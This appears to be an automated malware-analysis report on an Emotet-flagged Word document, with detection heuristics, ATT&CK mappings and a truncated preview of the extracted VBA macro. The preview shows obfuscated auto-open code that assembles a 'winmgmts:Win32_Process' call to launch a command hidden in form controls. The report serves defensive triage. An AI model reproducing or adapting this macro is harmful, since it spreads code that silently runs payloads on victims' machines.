Verdict: MALICIOUS (Risk Score: 222)
Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an autoopen subroutine, which is a common execution vector for Emotet. The macro utilizes CreateObject, a known technique for launching malicious payloads. ClamAV also identifies this as Emotet, increasing confidence in the family attribution.
Heuristics (7)
- ClamAV: Doc.Downloader.Emotet-10001946-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 354f2ad3cf51e6404b8b5669d00c1cef284ad791fa2583371268460a74f92742) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5354 bytes |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "cPN0C9, 0, 0, MSForms, ComboBox"
Attribute VB_Control = "HwWnJoB, 1, 1, MSForms, ComboBox"
Attribute VB_Control = "ooRZPMQc, 2, 2, MSForms, ComboBox"
Sub _
autoopen( _
)
Debug.Print "F4Bmz5" + ("k_kZjZ") + "pWpLirDj" + "lwDLEVk2" + "Rw3P8nu" + ("AIk6U0" + ("Pja1c6"))
Debug.Print "NGj6Oz" + ("GdAiZO") + "RiriI2uN" + "OUpw43" + ("jhNwzL" + "p29nqE")
Dl1S8chn
Debug.Print "l0IsfK" + ("CkZUldF") + "bUQO1p9" + "OlmccPri" + "r8s26q" + ("VUiIXp" + ("AQ95ULz"))
Debug.Print "n3mIKnC_" + ("dzdWj0Wi") + "GO9JEOb" + "wpHI9Jw" + ("MrfJk4" + "c6Z69nQ")
End Sub
Attribute VB_Name = "CcZuoSzj"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "D814ZY"
Attribute VB_Name = "U3v5jq"
Attribute VB_Name = "BmNM7w"
Attribute VB_Name = "zXjIi4q"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "VWdbl2P"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "bXNaTur"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "s6k2vPl"
Function Dl1S8chn()
aDuvwR = ThisDocument.HwWnJoB + ThisDocument.ooRZPMQc + ThisDocument.cPN0C9
Debug.Print "ANPP5aiB" + ("P6cEjtL") + "wvjlph" + "sAzTX2I2" + "rP_9Y1fl" + ("dlTzm9wK" + ("itojqBr"))
Debug.Print "DUOh8WLA" + ("mGDDTRQ") + "kZF0aWLH" + "OXJOqZm" + ("Sbb8zw" + "cpVRaUs")
ldoasE = "win"
Debug.Print "DrLFVH" + ("X27JOO") + "UTvVZGN" + "KibmzoE" + "EuFbidb" + ("L49a8wO9" + ("q59d1i"))
Debug.Print "RspN323" + ("R8wR63L") + "hzhoX1u" + "XHQQ9Zz" + ("NABHiwU5" + "z6CziW")
E1wA8rr = ldoasE + "mgmts:Win" + "32_Process"
Debug.Print "A4JwBraL" + ("mcjibd") + "zNpz1X" + "YR0z8U0" + "i18GFqo" + ("nnjXEcj" + ("JLNCzTo"))
Debug.Print "KDWZd1" + ("j3A4hBoV") + "sGMhT76w" + "fCnd3h" + ("GWKqTS" + "AioJjrL")
aMvuMT34(E1wA8rr).Create# aDuvwR, zpvbfp, D7McZzH, IlOhAAjj
Debug.Print "YOc1jvnc" + ("Gai1NLu") + "M4fXoQO" + "vjku_Pd4" + "zPlwwn" + ("s8AWqLjG" + ("swjR92ha"))
Debug.Print "VTWVIbA" + ("Euv8ZW2") + "sYN5VfB" + "lRuRWwUb" + ("iOOLacz" + "tJ6GF9")
End Function
Attribute VB_Name = "b03T4t"
Function D7McZzH()
Debug.Print "alpcEO" + ("zHTL6fYw") + "jUpq2Cz" + "F02WZ0" + "OdwH4TQ" + ("wMJ9NkXw" + ("f1vmqN"))
Debug.Print "nJv5Mn_" + ("RRwBYCB") + "jK5Zdlk" + "jj2I5w4j" + ("C_j9FO" + "ARNzthE")
ldoasE = SqKUj9T + "win" + KXBJ3i9
Debug.Print "GmiUbk" + ("NFoBzk_") + "zjw_WDO" + "kGwVphr" + "nLYuqHK" + ("owWjAFK" + ("OTwiTn"))
Debug.Print "sz6bGVmO" + ("MP5rziob") + "HFtL9X" + "iN4v3wQY" + ("jbvUwL7c" + "YS63tqt")
E1wA8rr = ldoasE + "mgmts:Win" + Yu6snCCd + "32_Process" + "Startup"
Debug.Print "K_7HRJz" + ("GkZwc6q") + "C5w9MCz" + "PbzXAGA" + "L6fGSS" + ("tHpftZ4w" + ("hOw5Vj"))
Debug.Print "bmvjSwl" + ("ZC8ljIa") + "FEkB6jU" + "hZVk0hw" + ("BTz35A" + "ouiIGXt")
Set D7McZzH = aMvuMT34(E1wA8rr)
Debug.Print "Vq8LaS" + ("aZAdYk") + "pN3MCEQ" + "RCwCXrb1" + "UiQhZXd" + ("k6wZCiYH" + ("HUZPUE"))
Debug.
```

... (truncated)